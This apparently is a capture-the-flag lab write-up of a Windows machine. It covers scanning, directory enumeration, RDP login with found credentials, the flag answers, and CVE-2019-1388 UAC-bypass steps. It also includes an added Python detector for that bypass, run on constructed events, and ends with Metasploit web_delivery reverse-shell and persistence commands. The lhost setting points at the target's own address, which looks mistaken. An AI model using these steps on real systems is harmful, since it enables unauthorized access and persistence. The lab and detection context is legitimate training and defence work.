A blast from the past!
scan the target, adding the -Pn option since Windows hosts often drop the ping probe
nmap -sS -Pn -sV -sC -T4 10.10.194.71
view the webpage
it's the default IIS Windows Server page
enumerate the directories using gobuster
gobuster dir -u http://10.10.194.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40
i found a hidden directory called /retro
view the webpage; we have a blog
maybe the username is wade
and i found a comment on that post that may be related to the password
log into the machine using remmina with these credentials:
host: 10.10.194.71
username: wade
password: parzival
inside, we have a user.txt
| Flag | user.txt |
|---|---|
| Answer | THM{HACK_PLAYER_ONE} |
let's dive into the machine and do some research about hhupd.exe
it's CVE-2019-1388; run the program as administrator
click on show more details and click show author certificate
click on the link and close the program; you will see a webpage in the browser, now save the webpage
search for C:\Windows\System32\cmd.exe to open cmd
here you are, the flag is on the Desktop of the Admin account
| Flag | root.txt |
|---|---|
| Answer | THM{COIN_OPERATED_EXPLOITATION} |
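a detection-side note, added here and not part of the original writeup: the CVE-2019-1388 chain above leaves a distinctive parent/child trail in process-creation telemetry (consent.exe spawning a browser as SYSTEM, then a shell under that browser). the events below are constructed Sysmon-style records, and the hostname WIN-TARGET is a placeholder.

```python
"""Detect the CVE-2019-1388 UAC bypass chain in process-creation events.
Events are constructed Sysmon-style dicts, not real telemetry."""

BROWSERS = {"iexplore.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SYSTEM = "NT AUTHORITY\\SYSTEM"

def _name(path):
    # basename of a Windows image path, lower-cased for comparison
    return path.rsplit("\\", 1)[-1].lower()

def detect_uac_bypass(events):
    """Return (rule, pid, image) alerts.
    Rule A: a browser started by consent.exe (the UAC dialog's certificate link).
    Rule B: a shell whose parent is a browser running as SYSTEM, i.e. the
    save-as dialog of that browser was used to launch cmd.exe."""
    alerts = []
    by_pid = {e["ProcessId"]: e for e in events}  # lets rule B inspect the parent
    for e in events:
        img, parent = _name(e["Image"]), _name(e["ParentImage"])
        if img in BROWSERS and parent == "consent.exe":
            alerts.append(("A:consent.exe->browser", e["ProcessId"], img))
        if img in SHELLS and parent in BROWSERS:
            p = by_pid.get(e["ParentProcessId"])
            if e["User"] == SYSTEM or (p is not None and p["User"] == SYSTEM):
                alerts.append(("B:system-browser->shell", e["ProcessId"], img))
    return alerts

# Constructed sample: one benign browser launch, then the bypass chain.
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 50, "User": "WIN-TARGET\\wade",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 60, "User": SYSTEM,
     "Image": r"C:\Windows\System32\consent.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"ProcessId": 201, "ParentProcessId": 200, "User": SYSTEM,
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\System32\consent.exe"},
    {"ProcessId": 202, "ParentProcessId": 201, "User": SYSTEM,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
]

if __name__ == "__main__":
    for alert in detect_uac_bypass(SAMPLE_EVENTS):
        print(alert)
```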
now we need to gain remote shell access and persistence
msfconsole
use exploit/multi/script/web_delivery
options
set the options, and set the target to PSH (PowerShell)
show targets
set target 2
set lhost 10.10.194.71
set lport 3389
set payload windows/meterpreter/reverse_http
run -j
Run the command on the compromised machine and a reverse shell will spawn in a new Metasploit session
run persistence -X